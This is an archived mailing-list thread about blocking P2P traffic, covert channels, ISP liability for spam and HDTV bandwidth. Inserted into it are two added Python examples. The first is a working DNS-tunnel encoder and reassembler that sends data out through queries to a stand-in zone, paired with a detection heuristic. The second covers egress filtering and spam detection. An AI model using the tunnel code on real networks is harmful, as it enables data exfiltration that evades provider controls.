And there are legal uses for P2P. I have a customer who works with some of
these technologies for legal and approved file transfers like game
publishing.
Well, blocking TCP SYNs is not a way to block establishment of sessions
between _cooperating_ hosts.
Simply make a small hack in the TCP stack to leave the SYN flag clear, and use
some other bit instead.
To really block something you need an application proxy... and then there
are always ways to subvert those. Elimination of covert channels is one of
the hardest problems. In any case, no sane provider will restrict traffic
only to applications which can be served by its proxies.
Going further, the growing awareness of the importance of security will
cause more and more legitimate apps to create totally indiscriminate
encrypted traffic... and it is a good idea to routinely encrypt all
traffic, to avoid revealing importance of particular communications.
Leaving identity of applications (different port #s) in the clear is also
a bad idea, security-wise.
--vadim
Date: Mon, 20 Jan 2003 19:59:08 -0800 (PST)
From: Vadim Antonov
Well, blocking TCP SYNs is not a way to block establishment
of sessions between _cooperating_ hosts.
With cooperating hosts, anything goes. Hack up the IP stack, and
have specially-crafted DNS queries carry the ISN. Or use GRE
tunnels. Or have special ICMP Unreachable packets... Sort of
reminds me of the "email me a file" substitute for FTP that was
fairly popular years ago.
To really block something you need an application proxy...
and then there are always ways to subvert those. Elimination
of covert channels is one of the hardest problems. In any
case, no sane provider will restrict traffic only to
applications which can be served by its proxies.
It would be nice if all protocols were proxy-friendly without
requiring proxies. Of course, that does nothing for encrypted
and steganographic traffic. Is elimination of covert channels
even possible? I'd say not.
One of the most useful protocols (SMTP) is virtually always
proxied... rarely does anyone use end-to-end SMTP without any
intervening MX. Allowing customer<-->* traffic vs. intercepting
and/or logging is up to the provider. At least one then can have
known flows to inspect, rather than wondering what the "push the
button" vector is.
Sadly, port perversion seems very common. I've added about a
dozen different ports on my home Squid cache. Any attempts to
demand full RFC compliance seem futile.
It begins to sound like peering... are decisions made based on
technical merit, or on not losing customers who whine because
they demand to use a broken implementation?
Eddy
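The "specially-crafted DNS queries" channel mentioned above, worked end to end as an added example that is not part of the original thread: a client encodes file bytes as labels of a query name under a zone the receiver controls, the authoritative side decodes and reassembles them, and a resolver-side heuristic shows what a provider can and cannot spot. The carrier zone `files.example.net`, the chunk size, the entropy thresholds and the sample payload are all assumptions made for the example.

```python
"""Added example (not from the original thread). A DNS-query covert channel
and a resolver-side heuristic for spotting it."""
import base64
import hashlib
import math
from collections import Counter

CARRIER_ZONE = "files.example.net"  # assumed receiver-controlled zone
MAX_LABEL = 63                       # RFC 1035 label length limit
MAX_NAME = 253                       # RFC 1035 name length limit (text form)


def encode_chunk(seq, payload, zone=CARRIER_ZONE):
    """One payload chunk -> query name <seq>.<base32 labels>.<zone>.
    Base32 is used because names are case-insensitive and labels are
    restricted to letters, digits and hyphen."""
    b32 = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"{seq:04x}", *labels, zone])
    if len(name) > MAX_NAME:
        raise ValueError("chunk too large for one query name")
    return name


def decode_query(name, zone=CARRIER_ZONE):
    """Inverse of encode_chunk: (seq, payload), or None if the name is not ours."""
    if not name.endswith("." + zone):
        return None
    labels = name[: -len(zone) - 1].split(".")
    try:
        seq = int(labels[0], 16)
        b32 = "".join(labels[1:]).upper()
        b32 += "=" * (-len(b32) % 8)  # restore the padding we stripped
        return seq, base64.b32decode(b32)
    except ValueError:
        return None  # ordinary host under the zone, e.g. www.files.example.net


def exfiltrate(data, chunk=32, zone=CARRIER_ZONE):
    """Split data into the query names a client would resolve one by one."""
    return [encode_chunk(i, data[o:o + chunk], zone)
            for i, o in enumerate(range(0, len(data), chunk))]


def reassemble(names, zone=CARRIER_ZONE):
    """What the authoritative server does: decode, order by seq, concatenate."""
    parts = [p for p in (decode_query(n, zone) for n in names) if p]
    return b"".join(payload for _, payload in sorted(parts))


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(name, min_len=40, min_entropy=3.5):
    """Resolver-side heuristic: a long, high-entropy subdomain below a
    two-label registrable domain. Thresholds are assumptions; they catch this
    encoder, but a slower channel using short dictionary-word labels would not
    trip them, which is the 'elimination is not possible' point."""
    sub = "".join(name.split(".")[:-2])
    return len(sub) >= min_len and shannon_entropy(sub) >= min_entropy


# Constructed sample payload: 128 deterministic pseudo-random bytes, standing
# in for the compressed/encrypted file a real client would push.
SAMPLE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(4))
BENIGN_NAMES = ["www.example.net", "mail.example.net", "cdn1.static.example.net"]


def resolver_report(names):
    """Names a provider's resolver log analysis would flag for a look."""
    return [n for n in names if looks_like_tunnel(n)]


if __name__ == "__main__":
    queries = exfiltrate(SAMPLE)
    print(queries[0])
    print("round trip ok:", reassemble(queries) == SAMPLE)
    print("flagged:", len(resolver_report(queries + BENIGN_NAMES)), "of", len(queries + BENIGN_NAMES))
```

The channel needs nothing but outbound UDP/53 to any resolver, which is why port blocking does not touch it; the heuristic, in turn, keys on length and entropy, so it is only a speed bump for an adversary willing to send less per query.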
Vadim - the instant someone sues a Provider for sexual harassment from their
spam epidemic you will start to see things change. The reason that no sane
provider will block these ports or services is because they have been
listening to their Network Admins too long, and in fact the problem is that
they are not sane providers. What they are, and this is pretty much true
across the board, is people that just don't care what they do to earn a buck;
otherwise we would not have these problems, and this is especially true of
those Network Operators that push all those billions of bytes of illicit
SPAM and throw their hands up and say "What do you expect us to do" - well,
the answer is simple. I expect you folks to operate within the law and to
cooperate in stopping people who use your services in violation of the laws.
And if the providers out there don't like that - then they should find other
businesses.
Todd Glassey
We were talking about P2P, not spam. P2P participants _want_ to talk to
each other, unlike spammer and his victims. ISPs already aggressively
fight spammers by terminating their service completely - no port blocking
or lawsuits are needed.
Blocking ports is not going to prevent communication between parties which
wish to communicate. And carriage of bits is about an order of magnitude
bigger economically than the whole entertainment industry. RIAA already
was stupid enough to make enemies of telcos (with that Verizon lawsuit).
The tech industry was bending themselves over to court Hollywood because
the common wisdom was that the content is going to be what people will pay
for. Wrong. Content-based dotcoms died, and people still pay for
Internet connectivity, in ever-increasing numbers. And spend more and
more time in front of computers instead of TVs. Simply because live
people on the other end of the wire are infinitely more interesting than
the prechewed corporate crud called "content".
So I think we'll see some fireworks on the legal front, but the outcome is
already clear - unfiltered connectivity is what consumers wish to pay for,
not the sanitized disneys.
--vadim
Vadim - the newest form of SPAM uses the Messenger facility to place a
pop-up in the middle of your screen without any email, POP, SMTP or other
service being involved. I apologize for the tone of the first posting, but I
still stand by it. When ISPs are held accountable for what people do with
the BW they sell them, then these issues will all be moot. Until then, the
lie is that there is no way to stop these behaviors, and it's the one the
ISPs proffer exclusively.
Todd
(Taking NANOG out, as this is moving a little towards personal conversation)
Vadim - the instant someone sues a Provider for sexual harassment from
their spam epidemic you will start to see things change. The reason that
no sane provider will block these ports or services is because they have
been listening to their Network Admins too long, and in fact the problem
is that they are not sane providers. What they are, and this is pretty
much true across the board, is people that just don't care what they do to
earn a buck; otherwise we would not have these problems, and this is
especially true of those Network Operators that push all those billions of
bytes of illicit SPAM and throw their hands up and say "What do you expect
us to do" - well, the answer is simple. I expect you folks to operate
within the law and to cooperate in stopping people who use your services
in violation of the laws. And if the providers out there don't like that - then they should find
other businesses.
I think you're *nuts* if you think an ISP should be held entirely
accountable for its customers' actions.
I'm one of a handful of administrators in a small ISP, and we do our
damnedest to ensure that everything runs smoothly. We have a fairly strict
AUP that we actually enforce, we do egress filtering (not enough, but we're
working towards it), we contact customers that are infected with virii and
worms, and we have *zero* tolerance for script kiddies (usually instant
blackholes).
IMHO, that is about all you can expect an ISP to do. Have an AUP that
incorporates all of your problems (spam, abuse, viruses, etc), and enforce
it. You can *not* expect the ISP to police absolutely everything that its
customers do. You can *not* expect the ISP to be held responsible for three
of its fifteen thousand customers browsing child porn. You can *not* expect
the ISP to be accountable for its two hundred script kiddies.
You *can* expect the ISP to have an AUP. You *can* expect the ISP to react,
and to react quickly. You *can* expect the ISP to co-operate with the
proper authorities, if it goes to that level. You *can* expect the ISP to
contact and work with (when and where needed) other ISPs to track down and
solve problems.
I am a Network Admin, and I am *still* looking for an effective way to block
outbound spam from our customers. I spent two months purging all our mail
servers of FormMail, and scan them every night for more vulnerable versions.
Do you think that I should be sued because one of these slips through the
cracks (there's a 24-hour window in which one can be installed and abused),
and you get some porn spam? I certainly hope not.
Being able to sue ISPs for their customers' actions is pure insanity, and
will just lead to massive ISP shutdown world-wide.
However, being able to sue ISPs for *negligence* and for *ignoring*
customers' actions is a whole different boat, and I think is an idea worth
looking at.
- Damian Gerow, an overworked, underpaid, underappreciated Network
Administrator. Strung out on caffeine, because I spent most of last night
hashing out some more details on our anti-spamming actions.
Apparently, I didn't read my own Cc: line. Sorry, folks.
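Two of the edge controls the post above describes, egress filtering and watching outbound spam, as an added example that is neither code from the original thread nor from the poster's ISP. The first is source-address validation in the BCP 38 sense: a packet leaving a customer port must carry a source inside the prefixes assigned to that port, otherwise it is spoofed and dropped. The second is an outbound-SMTP fan-out heuristic: a customer host opening TCP/25 to many distinct mail servers inside one window is a relay or an infected box worth a look. The port names, the prefix table, the flow records, the window and the threshold are all constructed for the example.

```python
"""Added example (not from the original thread). BCP 38 style source
validation and an outbound-SMTP fan-out check over constructed flow records."""
import ipaddress
from collections import defaultdict

# Assumed customer port -> assigned prefixes (RFC 5737 documentation ranges).
CUSTOMER_PREFIXES = {
    "ge-0/0/1": [ipaddress.ip_network("192.0.2.0/25")],
    "ge-0/0/2": [ipaddress.ip_network("192.0.2.128/25"),
                 ipaddress.ip_network("198.51.100.0/24")],
}


def source_is_valid(port, src):
    """True if src falls inside a prefix assigned to this customer port."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in CUSTOMER_PREFIXES.get(port, []))


def egress_verdicts(records):
    """Per-record 'forward' or 'drop-spoofed'. A port with no assignment is
    dropped as well: an unconfigured port must not be able to source traffic."""
    return ["forward" if source_is_valid(r["port"], r["src"]) else "drop-spoofed"
            for r in records]


def smtp_fanout_suspects(records, window=60, max_dests=20):
    """Bucket outbound TCP/25 connections by (port, src, fixed window) and
    report the sources that reach more than max_dests distinct servers.
    Window and threshold are assumptions, not tuned values."""
    dests = defaultdict(set)
    for r in records:
        if r["proto"] == "tcp" and r["dport"] == 25:
            dests[(r["port"], r["src"], r["t"] // window)].add(r["dst"])
    return sorted({(port, src) for (port, src, _), d in dests.items()
                   if len(d) > max_dests})


def rec(port, src, dst, proto, dport, t):
    """One flow record: customer port, addresses, protocol, dest port, seconds."""
    return {"port": port, "src": src, "dst": dst, "proto": proto, "dport": dport, "t": t}


# Constructed flow sample: normal browsing, one legitimate mail connection,
# one spoofed packet, and a burst from one host to 25 different mail servers.
SAMPLE_FLOWS = [
    rec("ge-0/0/1", "192.0.2.10", "203.0.113.80", "tcp", 80, 0),
    rec("ge-0/0/2", "198.51.100.7", "203.0.113.25", "tcp", 25, 5),
    rec("ge-0/0/1", "203.0.113.9", "203.0.113.53", "udp", 53, 7),   # spoofed source
    rec("ge-0/0/2", "192.0.2.200", "203.0.113.80", "tcp", 443, 9),
] + [rec("ge-0/0/1", "192.0.2.77", f"203.0.113.{i}", "tcp", 25, 10 + i)
     for i in range(1, 26)]


if __name__ == "__main__":
    verdicts = egress_verdicts(SAMPLE_FLOWS)
    print("dropped as spoofed:", verdicts.count("drop-spoofed"))
    print("SMTP fan-out suspects:", smtp_fanout_suspects(SAMPLE_FLOWS))
```

The source check only stops forged addresses; spam from a customer's real address passes it, which is why the fan-out count is the part that actually earns an abuse ticket. Note it reports a (port, source) pair for a human to act on rather than dropping anything by itself, in line with the post's "react quickly" rather than "police everything".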
No, we evil network admins are NOT saying there is no way to stop these
behaviors. We're saying that the solutions put such a crimp on open
standards and legitimate behavior that their value is negative. The
problem is a social one, not a technical one. The technical problem is the
vulnerability that exists; the social problem is that as long as ANY
vulnerability exists, people will try to exploit that vulnerability.
Technology can mitigate the vulnerabilities, but it cannot mitigate the
desire to exploit.
For instance, substitute "airport" for "network", as in "airport
security". There are ways for law enforcement to be 100% positive that no
terrorist ever sets foot on a plane. Unfortunately, the cost involved,
along with the reduction in efficiency, would make normal travel
impossible.
Do you try to hold real estate developers responsible for what the
homeowner does with their house? Do you try to hold the power company
responsible for the people who use their electricity to grow weed?
I assume you were beating down the doors of Congress, trying to get rock
artists to be responsible for the people who committed suicide after
listening to their albums?
Andy
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Andy Dills 301-682-9972
Xecunet, LLC www.xecu.net
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Dialup * Webhosting * E-Commerce * High-Speed Access
Not to mention the fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s.
As always, it gets down to doing the math, something many dot bombers
weren't (aren't) very good at. AOL/Time Warner is just the first major
example of this 'not yet ready for prime time' business plan. Not to
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.
When fiber-to-the-curb is the norm we'll be able to 'Ride the Light'
Until then, your mileage may vary. You might also see some change in
settlement plans and consumer pricing about that same time.
Best regards,
Al Rowland wrote:
Not to mention the fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s.
VDSL or ADSL2+ would cut it, until fiber to the curb becomes the norm. However,
many school/university dorms and new housing developments are well networked
already, so high-bandwidth consumer connectivity exists in large numbers.
(where did you think the KaZaa supernodes and DirectConnect hubs are?)
Pete
Not to mention the fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s.
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to ~1.5 Mbps with not much in the way of image quality loss.
That puts you into DSL/Wireless range.
As always, it gets down to doing the math, something many dot bombers
weren't (aren't) very good at. AOL/Time Warner is just the first major
example of this 'not yet ready for prime time' business plan. Not to
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.
When fiber-to-the-curb is the norm we'll be able to 'Ride the Light'
Until then, your mileage may vary. You might also see some change in
settlement plans and consumer pricing about that same time.
I think you'll see it long before every house has fiber run to it.
My 2 cents anyway.
-Chris
Speaking of HDSL over copper, does anyone know anything about a company
called Rose Telephone that reportedly has an HDTV over T1 service?
1. I also remember when web page standards required you to design
everything to fit in a 640x400 screen. DTV/HDTV will significantly
change your 'not much in the way of image quality loss' yardstick. My
viewing habits have changed significantly in the year plus I've been
DTV/HDTV. Among other things, I go to the movies a lot less. DVD quality
(which is lower than HDTV) is better than most movie theaters and
there's no gum/spilled drink (most of the time) on my floor.
2. I already have it. It's called broadcast. $100 (could have been less
but I always over design) antenna and $20 of coax. No monthly fee. I do
pay for the DirecTV feed, but that's a separate flame war.
Of course, you could just as easily be right.
Best regards,
"Al Rowland" <alan_r1@corp.earthlink.net> writes:
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.
Of course, because you are definitely being kept in the loop regarding
the AOL settlement plans?
/vijay
1. I also remember when web page standards required you to design
everything to fit in a 640x400 screen. DTV/HDTV will significantly
change your 'not much in the way of image quality loss' yardstick. My
viewing habits have changed significantly in the year plus I've been
DTV/HDTV. Among other things, I go to the movies a lot less. DVD quality
(which is lower than HDTV) is better than most movie theaters and
there's no gum/spilled drink (most of the time) on my floor.
Agreed, however the source video that I've seen demoed is from DVD. Side
by side comparison shows slight degradation, but solo viewing is more
than adequate. This also isn't targeted to people at the end of the
bell curve for technology adopters and purists, rather at the fat middle
section that isn't upgrading to ( or doesn't care about ) HDTV yet and
for whom current "digital video" quality is "just fine".
2. I already have it. It's called broadcast. $100 (could have been less
but I always over design) antenna and $20 of coax. No monthly fee. I do
pay for the DirecTV feed, but that's a separate flame war.
Last I checked "premium" channels came via Cable or Satellite. If
you have a separate DSL line and DirecTV then you are doubling up on
delivery costs. Would the average consumer like to "add" video to their
DSL connection? The cable company cuts you a deal if you have video
and data on the same line. Wouldn't the telcos like to compete in that
market?
Of course, you could just as easily be right.
Who knows? Reality will probably end up somewhere in the middle.
-Chris
It's actually funny you mention this. I'd been working on a way to deliver
television via ATM for years, just never had much interest. But basically,
by attaching to the cloud and then being able to draw PVCs over to DSL
lines it should be quite possible. Don't forget also many of us in given
areas have faster than 1.5 down; in my case it's 6 down, which should be
plenty for a good TV picture. I'm sure Bell would love to put a set top
box in when you buy DSL, maybe even have it part of the shipping package
you get when you join which delivers TV. Give you phone, net and TV over
one pair - they should eat that up! Not to mention theoretically ISPs
should be able to offer it as well with their own offerings.
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to
~1.5 Mbps with not much in the way of image quality loss.
Raw HDTV is about 1.2Gbps. RAW NTSC SDI bitstream is a few hundred.
The 6 and 19.8 are already compressed. Obviously putting more horsepower
to the compression you can achieve smaller data rates. However applying
for example MPEG4 instead of MPEG2 for 1080i or 720p ups the computational
requirements beyond current consumer state of the art.
I think you'll see it long before every house has fiber run to it.
75% is enough.
Pete
Hello;
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to
~1.5 Mbps with not much in the way of image quality loss.
Raw HDTV is about 1.2Gbps. RAW NTSC SDI bitstream is a few hundred.
The 6 and 19.8 are already compressed. Obviously putting more horsepower
to the compression you can achieve smaller data rates. However applying
for example MPEG4 instead of MPEG2 for 1080i or 720p ups the computational
requirements beyond current consumer state of the art.
The first MPEG-4 HD set top boxes are beginning to appear
http://www.sigmadesigns.com/news/press_releases/030108.htm
Watch this space....
Regards
Marshall Eubanks
I think you'll see it long before every house has fiber run to it.
75% is enough.
Pete
T.M. Eubanks
Multicast Technologies, Inc.
10301 Democracy Lane, Suite 410
Fairfax, Virginia 22030
Phone : 703-293-9624 Fax : 703-293-9609
e-mail : tme@multicasttech.com
http://www.multicasttech.com
Test your network for multicast :
http://www.multicasttech.com/mt/
Status of Multicast on the Web :
http://www.multicasttech.com/status/index.html
Andy -